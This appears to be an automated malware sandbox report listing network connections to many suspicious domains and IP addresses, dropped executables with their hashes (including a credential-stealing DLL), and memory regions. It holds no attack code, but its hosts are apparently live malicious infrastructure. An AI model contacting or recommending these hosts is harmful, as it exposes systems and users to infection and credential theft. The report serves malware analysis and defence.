US 172.67.169.43:443 shatterbreathepsw.shop tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 shortsvelventysjo.shop udp
US 104.21.16.225:443 shortsvelventysjo.shop tcp
US 8.8.8.8:53 incredibleextedwj.shop udp
US 172.67.218.63:443 incredibleextedwj.shop tcp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 43.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 225.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 63.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 alcojoldwograpciw.shop udp
US 172.67.157.23:443 alcojoldwograpciw.shop tcp
US 8.8.8.8:53 file-host-host0.com udp
US 8.8.8.8:53 liabilitynighstjsko.shop udp
RU 109.196.164.182:80 file-host-host0.com tcp
US 104.21.44.3:443 liabilitynighstjsko.shop tcp
RU 185.215.113.67:26260 tcp
US 8.8.8.8:53 demonstationfukewko.shop udp
US 104.21.33.174:443 demonstationfukewko.shop tcp
US 8.8.8.8:53 23.157.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 182.164.196.109.in-addr.arpa udp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 174.33.21.104.in-addr.arpa udp
RU 193.233.132.234:80 193.233.132.234 tcp
FR 52.143.157.84:80 tcp
US 8.8.8.8:53 parrotflight.com udp
US 172.67.187.204:443 parrotflight.com tcp
US 8.8.8.8:53 234.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 204.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 junglethomas.com udp
US 104.21.92.190:443 junglethomas.com tcp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 190.92.21.104.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 file-drop.cc udp
US 104.21.95.172:443 file-drop.cc tcp
US 8.8.8.8:53 172.95.21.104.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 193.233.132.175:80 193.233.132.175 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 skategirls.org udp
US 8.8.8.8:53 realdeepai.org udp
US 188.114.96.2:443 realdeepai.org tcp
US 188.114.96.2:443 realdeepai.org tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.112:80 net.geo.opera.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 jonathantwo.com udp
US 188.114.96.2:443 jonathantwo.com tcp
US 188.114.96.2:443 jonathantwo.com tcp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 175.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 features.opera-api2.com udp
NL 82.145.216.16:443 features.opera-api2.com tcp
US 8.8.8.8:53 download.opera.com udp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
NL 185.26.182.117:443 download.opera.com tcp
US 8.8.8.8:53 download5.operacdn.com udp
US 104.18.10.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 16.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 117.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 89.10.18.104.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
FR 52.143.157.84:80 tcp
US 8.8.8.8:53 palmeventeryjusk.shop udp
US 104.21.7.13:443 palmeventeryjusk.shop tcp
US 8.8.8.8:53 entitlementappwo.shop udp
US 104.21.75.133:443 entitlementappwo.shop tcp
US 8.8.8.8:53 economicscreateojsu.shop udp
US 104.21.47.60:443 economicscreateojsu.shop tcp
US 8.8.8.8:53 13.7.21.104.in-addr.arpa udp
US 8.8.8.8:53 133.75.21.104.in-addr.arpa udp
RU 5.42.66.10:80 5.42.66.10 tcp
US 8.8.8.8:53 pushjellysingeywus.shop udp
US 8.8.8.8:53 api.myip.com udp
US 172.67.217.241:443 pushjellysingeywus.shop tcp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 absentconvicsjawun.shop udp
US 172.67.135.202:443 absentconvicsjawun.shop tcp
US 8.8.8.8:53 60.47.21.104.in-addr.arpa udp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 241.217.67.172.in-addr.arpa udp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 202.135.67.172.in-addr.arpa udp
US 8.8.8.8:53 suitcaseacanehalk.shop udp
US 104.21.86.26:443 suitcaseacanehalk.shop tcp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 26.86.21.104.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 bordersoarmanusjuw.shop udp
US 172.67.189.66:443 bordersoarmanusjuw.shop tcp
US 8.8.8.8:53 mealplayerpreceodsju.shop udp
US 104.21.22.58:443 mealplayerpreceodsju.shop tcp
US 8.8.8.8:53 wifeplasterbakewis.shop udp
US 172.67.196.237:443 wifeplasterbakewis.shop tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 66.189.67.172.in-addr.arpa udp
US 8.8.8.8:53 58.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 237.196.67.172.in-addr.arpa udp
EG 41.199.23.195:7000 tcp
FR 52.143.157.84:80 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 saveclinetsforme68465454711991.publicvm.com udp
NL 91.92.254.108:7000 saveclinetsforme68465454711991.publicvm.com tcp
US 8.8.8.8:53 108.254.92.91.in-addr.arpa udp
US 8.8.8.8:53 saveclinetsforme68465454711991.publicvm.com udp
NL 91.92.254.108:1111 saveclinetsforme68465454711991.publicvm.com tcp
FR 52.143.157.84:80 tcp
US 8.8.8.8:53 165.191.110.104.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
FR 52.143.157.84:80 tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.16.238:443 clients2.google.com tcp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
GB 172.217.16.238:443 clients2.google.com tcp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 35.82.94.151:80 api2.check-data.xyz tcp
US 8.8.8.8:53 151.94.82.35.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp

Files

memory/4136-0-0x0000000000CA0000-0x0000000001140000-memory.dmp

memory/4136-1-0x0000000077E54000-0x0000000077E56000-memory.dmp

memory/4136-7-0x00000000053B0000-0x00000000053B1000-memory.dmp

memory/4136-6-0x00000000053A0000-0x00000000053A1000-memory.dmp

memory/4136-5-0x0000000005400000-0x0000000005401000-memory.dmp

memory/4136-4-0x00000000053C0000-0x00000000053C1000-memory.dmp

memory/4136-3-0x00000000053E0000-0x00000000053E1000-memory.dmp

memory/4136-2-0x00000000053D0000-0x00000000053D1000-memory.dmp

memory/4136-8-0x0000000005420000-0x0000000005421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

MD5 45baabedac16743b338c03f49565b4dd
SHA1 a6df18d77d1b8efdce21ce326d24757d576ec328
SHA256 cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09
SHA512 9d4e74b95c31aad0779d846898c8d328ea1058f53b9e141ae4be4b88ac0ec2bd4fdd54695cf45f2531be88685556a69b6ba68a023b2f97ddf5e4edefe7a3b8e9

memory/2804-22-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/4136-21-0x0000000000CA0000-0x0000000001140000-memory.dmp

memory/2804-24-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

memory/2804-28-0x0000000004A90000-0x0000000004A91000-memory.dmp

memory/2804-27-0x0000000004A80000-0x0000000004A81000-memory.dmp

memory/2804-26-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

memory/2804-25-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

memory/2804-23-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

memory/2804-29-0x0000000004B00000-0x0000000004B01000-memory.dmp

memory/2804-30-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

memory/1208-36-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-33-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-37-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/1208-38-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-42-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-43-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-48-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-53-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-54-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-58-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-59-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-57-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-56-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-55-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-52-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-51-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-50-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-49-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-47-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-46-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-45-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-44-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-41-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-40-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-39-0x0000000000400000-0x00000000009F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe

MD5 52888eee3e1addc691fac6457d9bacf5
SHA1 882206e85b8c715dfdab73ad8351cdfb30fc2274
SHA256 b29ea757f2461316b83ae70f323d7ebe0898fa4512daadc2d24317880df30f4d
SHA512 b5cd45a6b9a0d55078f533c8540362d7bae0fec98838aa651e15ec036c1527357181db8d510afb537cde520b9fd8fc3eb9e0010e8c241f2e4b07d87c7797dea0

memory/1208-69-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-70-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-60-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-72-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-75-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1208-74-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/2804-71-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/1208-73-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1968-83-0x0000000000290000-0x0000000000768000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe

MD5 4ae9aceb63484a21bcc72d3007e40713
SHA1 1258341a5fefe5b3fbbae8e82be458e76dcdd16b
SHA256 a0431acb1e22bf1c047d1fa3f84a126b5528e1a6e6f94a76bae301e58afa70fb
SHA512 aafb8d110822705f8fa43508666dace136acb790f7c34ab74ff602e5062270cdb2e97ed236fd01aa55f011000c408648d3362580bd1d3a27ce3f50996391ba65

\??\pipe\crashpad_4724_PQPISHGXEHIWEXGF

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1968-116-0x0000000000290000-0x0000000000768000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\1000017002\dfb8c0b47f.exe

MD5 d5046b8351b33c1e2a0f0a9b3cc8a108
SHA1 003150dd5f551aba833f8e557210c5774d292f4a
SHA256 5dbccfc0f39609d03f26cbcd5275459a84cc79f55e80bf86bc938a9ced81d6e0
SHA512 570e6e5bcb8a583a9c6ecea8d23c2267aa5bd6a60e99f85b7d00049b16b9a6fe16f0f0179858a46b159de1cf9c0b6074e2a862a4a94e373a923bc7eec407099e

memory/4384-171-0x00000000002A0000-0x0000000000895000-memory.dmp

memory/5288-176-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/5296-177-0x0000000000230000-0x0000000000708000-memory.dmp

memory/5288-182-0x0000000000DE0000-0x0000000001280000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

MD5 1c7d0f34bb1d85b5d2c01367cc8f62ef
SHA1 33aedadb5361f1646cffd68791d72ba5f1424114
SHA256 e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c
SHA512 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

memory/5836-202-0x0000000000950000-0x00000000009A2000-memory.dmp

memory/5928-205-0x0000000000400000-0x000000000044C000-memory.dmp

memory/5928-207-0x0000000000400000-0x000000000044C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\8cc88173-9023-48b8-96b4-67745d1887cd.tmp

MD5 10858e689d8357ecedc7ea880563bcd6
SHA1 5ac003314d3133db853729d89486d3cb88f43293
SHA256 47688b5b1afc0911fe62920df10724b0852b87b6db6e7a19e3b053a0732b5c21
SHA512 5a97c35696695594346d9f496ad74bb9fc8a29c184580730ecc68a588589c6db2c65a888183fe0c73631b9d9e367db58cf6744ff8b947848dc24c57390dae0fa

memory/2804-213-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/2804-214-0x0000000000DE0000-0x0000000001280000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

MD5 31841361be1f3dc6c2ce7756b490bf0f
SHA1 ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA512 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

memory/3216-232-0x0000000000400000-0x0000000000592000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

MD5 b22521fb370921bb5d69bf8deecce59e
SHA1 3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea
SHA256 b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158
SHA512 1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

MD5 20ae0bb07ba77cb3748aa63b6eb51afb
SHA1 87c468dc8f3d90a63833d36e4c900fa88d505c6d
SHA256 daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d
SHA512 db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

MD5 0c582da789c91878ab2f1b12d7461496
SHA1 238bd2408f484dd13113889792d6e46d6b41c5ba
SHA256 a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
SHA512 a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

memory/5600-271-0x0000000000B00000-0x0000000000BC0000-memory.dmp

memory/872-270-0x0000000005230000-0x00000000052C2000-memory.dmp

memory/872-269-0x0000000005740000-0x0000000005CE4000-memory.dmp

memory/872-263-0x0000000000830000-0x0000000000882000-memory.dmp

memory/872-275-0x0000000005160000-0x000000000516A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 481f8f504f80eff8c5640313cae6e7ec
SHA1 1d8478e785550b3263d3b669bc38a89c11ff51b8
SHA256 c07afbb803dbfb68dbbf46a650a36d10172b387a443d15e37a8f7278cca6cf0a
SHA512 aa6bca8be2a246960ae806bdd49294b42c43e89efd41f448551c563bb38c6e542160c9d1b73bb7d1d0963452449bc466dc9724ee9f86c6d701a5893bf9b54081

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 162991d57090d7618fee67284e384379
SHA1 4eb6b04fa54b76ea4069692ceb0064ab5e03903c
SHA256 d2bf6f1b78c8af6eaaf8ae2d555d76111d7cad0349da8f3d3958722b549f0944
SHA512 ae0fa7283e8e473b74572f9f83996ee040d3aa3b0cd3c7d41d71c280072205e22126dac83ccf27ba5f83bbb1e50ae430ea7a0c9bd1206be72eb30afd49710a0d

C:\Users\Admin\AppData\Local\Temp\Tmp9CAD.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/5916-286-0x0000000000400000-0x000000000044E000-memory.dmp

memory/872-304-0x0000000005DF0000-0x0000000005E66000-memory.dmp

memory/5916-301-0x0000000000400000-0x000000000044E000-memory.dmp

memory/872-305-0x0000000006590000-0x00000000065AE000-memory.dmp

memory/872-308-0x0000000006E10000-0x0000000007428000-memory.dmp

memory/872-310-0x00000000068A0000-0x00000000068B2000-memory.dmp

memory/872-309-0x0000000006960000-0x0000000006A6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

memory/872-311-0x0000000006900000-0x000000000693C000-memory.dmp

memory/872-321-0x0000000006A70000-0x0000000006ABC000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 176214ed4c259713b0da7bf9b8adf388
SHA1 4c6784c18d603cfb9f5373d883e6c8b62d6d7878
SHA256 abbd81f4564d67d0c0c9a9134d11923ef5c76c880fca3ef212ccfda3557acd50
SHA512 b3e5f4c5cb4055d9bb184cfe505e5f03af7538a35a5261328bfae7a69315ab877538f26e6d539f0d32acb8e7611edfe988e6b93c5aae33f8c86b2224f8a10761

C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe

MD5 3a545954790956c3006c896d85e17a9d
SHA1 d53a6f2e27c9095afe5168133e959b8c0f9cf9e0
SHA256 729a25fd44404f57246778a7b9cdbf469810a1bac9f18ee4d24e1c26935fff3c
SHA512 8c22409315d5a9942feab1996eb8dc66c7fca5d4acf74bfe98552a71ad4299141cc32b7072f511afe070046d06dc10a4c946dc60eedfc4b5f80be77de9625319

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

MD5 8510bcf5bc264c70180abe78298e4d5b
SHA1 2c3a2a85d129b0d750ed146d1d4e4d6274623e28
SHA256 096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6
SHA512 5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

memory/5216-370-0x0000000000B30000-0x0000000000B82000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2818691465-3043947619-2475182763-1000\76b53b3ec448f7ccdda2063b15d2bfc3_f546c72a-ef7d-4387-9afa-727536aab388

MD5 e3268413ab696ab61276375ba9fd3cd6
SHA1 ce66907a6b89dab6b245a5e70f8d32aefdad62ca
SHA256 887d4b2c40fca4ab1b4927edc8ff4ff9a0c9e277f75665eb6e30b2c0f5bf4995
SHA512 7ce2df5deb1d00eea84dc3d176b385ee4de3f3adf080c00851028ccb7a1c2ee24848bb116c3dd059199392d15f665b8d9fe98ecacaddb7b830937f48c9084402

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 8593cfb57cf7247bbdd284927565ca80
SHA1 c286e40e95190c25a35c6595e11fa6d7af37eef3
SHA256 5f4da099bbbc83d01510024fa59702eb8a6f6ba3c8994ab0ff6a03932d9e7727
SHA512 30c906ae71cab14b0e0ac6660fe5e0fcfe11809949ea1c498f5d9297556506055879218363a639a388832b9e88df8b6c5e56fad512edb4249f212087da4d03e1

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 938e000385874c83d46b88d9a25efada
SHA1 54345264ba9d2e81fca706e7377be5f0c370530e
SHA256 de16f80475ba656df1af916e6dd8c50c95ef2cacaae102b830dbf107a12de565
SHA512 60991205263c5fff4828a834e8db743b2605c280d03d5a0a8936393be590d410e4d5a96d70ebe555e5c014f93c31e351fe8fd5e15e1cab92ad09ab924a3e3c47

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

MD5 586f7fecacd49adab650fae36e2db994
SHA1 35d9fb512a8161ce867812633f0a43b042f9a5e6
SHA256 cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e
SHA512 a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

memory/5784-411-0x00000000001F0000-0x000000000021E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe

MD5 df469e0a98c5be3dbbdee404268d491a
SHA1 17951c7c3b3dbb7769efa595298ac0183e000c77
SHA256 a48d767621acecbb12a31fbd4007a16e77e6a0155d255c056f2400d0b17cfeba
SHA512 8c90c9e5b57a854b38600946659d39519a222d5cc36008ef9617df74719e662d66445ca223cff7feffabbb50ecad6028d06d436c5d8fdb349b6bf9ddd1128dfc

memory/5404-425-0x0000000000400000-0x000000000063B000-memory.dmp

memory/5404-423-0x0000000000400000-0x000000000063B000-memory.dmp

memory/5600-435-0x000000001E690000-0x000000001E79A000-memory.dmp

memory/5600-440-0x000000001C8D0000-0x000000001C90C000-memory.dmp

memory/5600-439-0x000000001C680000-0x000000001C692000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 950a78d5a667eb42a4075187beb4838f
SHA1 29a2e160a0b49874f5e878cd96c9f28c0f3d1d20
SHA256 9d6ddb44906d8e1189e7259fc7cddc6cef8ba96e2e30c0fad5a97fc711863975
SHA512 11c9c6e6279808a98c54c23788280fbd1a7d2d37ccb9b960e70f18e9bd87c688fef6103c1445783248532b727f93c1ef88e4722a541e08e44089030707006688

C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe

MD5 3a06b0e1b3c824af53e2afa0d829aa15
SHA1 1be34bb607ce468cfef097fc554311c654753fbf
SHA256 a1206db756b5bea4a8b2f3f5f5ecd588f667d1d4371db52bb8bb40da82f8f3b0
SHA512 e68e515630be8e92efb43ed5468099b3496e79b3cbb750145c88c4575cf8e28fb0cfd3d67b0d8a56c35281e158efce3e610eed01e0e314cc5501e577f4f6f451

memory/5600-458-0x000000001E920000-0x000000001E996000-memory.dmp

memory/5600-461-0x000000001C8B0000-0x000000001C8CE000-memory.dmp

memory/5296-470-0x0000000000230000-0x0000000000708000-memory.dmp

memory/2804-468-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/4384-469-0x00000000002A0000-0x0000000000895000-memory.dmp

memory/872-480-0x0000000006BB0000-0x0000000006C16000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll

MD5 f35b671fda2603ec30ace10946f11a90
SHA1 059ad6b06559d4db581b1879e709f32f80850872
SHA256 83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7
SHA512 b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705

memory/5600-488-0x000000001F870000-0x000000001FD98000-memory.dmp

memory/5600-486-0x000000001F170000-0x000000001F332000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpB8D5.tmp

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\tmpB955.tmp

MD5 b7f8b07794f679ee2722d75c769956aa
SHA1 2405da452b69969aff07dd86a1261c207072d4a5
SHA256 78b10044a64b865a76348db8e4651eaa87490d4bd150aeaa97bc221b2675e7be
SHA512 c5438f9a1b17563a92b4369e565fed17439a44ca22c2f721743141590d579b804012131bd8da1cdb41d1fbb79b791ee3425d1f5bf9781a4bd2db135ad2cac453

C:\Users\Admin\AppData\Local\Temp\tmpBA78.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 2888d9d4735a957b4e5c0f19d88c4d39
SHA1 2036af365379577c8910969a283a8aa90285423e
SHA256 02ce071c457252150258f108aff7fbd32b6d31d97be53279c16384789945413c
SHA512 a752ecd6e95adcc0031b423deb8c179854d487196a517eb177c1394869f4fdf85692621d02db0c2b6605990f7be945703c2dc6fd1982284da8403c351ee4178c

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 d7665d51f31a1d81937556b9c9b948c5
SHA1 95249eced82042b09145bd14c4cfbd50341b143f
SHA256 324ced5dc24e16376e7f210643263b0ca691f8f8a046047eb2a347ddda42233b
SHA512 5ecf7cb374ac0d3b0b0fb36d5f42438057f97e78a2a3f5d106afb8d7b77720c116ee9a538215a12e197e3b1b59430f40c811e8362bf447a952d5e24c8e933262

memory/5288-564-0x000001F3BA980000-0x000001F3BA9A2000-memory.dmp

